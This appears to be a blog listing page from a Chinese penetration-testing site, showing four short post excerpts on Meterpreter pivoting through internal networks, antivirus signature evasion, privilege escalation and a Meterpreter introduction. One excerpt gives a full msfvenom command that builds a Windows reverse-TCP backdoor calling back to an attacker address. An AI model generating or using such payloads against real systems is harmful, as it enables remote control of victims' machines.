摘要: 0x01 meterpreter多级内网代理穿透 1.Pivoting 基本上可以概括为,在正常情况下仅仅只是通过利用被控制的计算机我们可能依旧无法进行网络访问。假设一台被控制的计算机连接有多个网络,将其作为我们的跳板,那么网络隔离的手段对我们来说就形同虚设。跟着这个思路,攻击者在被控制的跳板主机上 阅读全文
posted @ 2018-08-16 03:07 渗透测试中心 阅读(740) 评论(0) 推荐(0) 编辑
摘要: 0×01 静态检测与对抗 1.静态分析原理 简单的来说,就是通过特征码识别静态文件,杀软会扫描存在磁盘上的镜像文件,如果满足特征码,就识别为恶意软件。 恶意软件匹配规则yara匹配恶意软件的时候就是用的这样的方式。 通过特征来识别抓HASH工具QuarksPwDump,yara规则如下(查看源码) 阅读全文
posted @ 2018-08-16 03:05 渗透测试中心 阅读(1475) 评论(0) 推荐(0) 编辑
摘要: 0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe 阅读全文
posted @ 2018-08-16 03:03 渗透测试中心 阅读(31652) 评论(1) 推荐(2) 编辑
摘要: 0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链 阅读全文
posted @ 2018-08-16 02:56 渗透测试中心 阅读(135657) 评论(7) 推荐(9) 编辑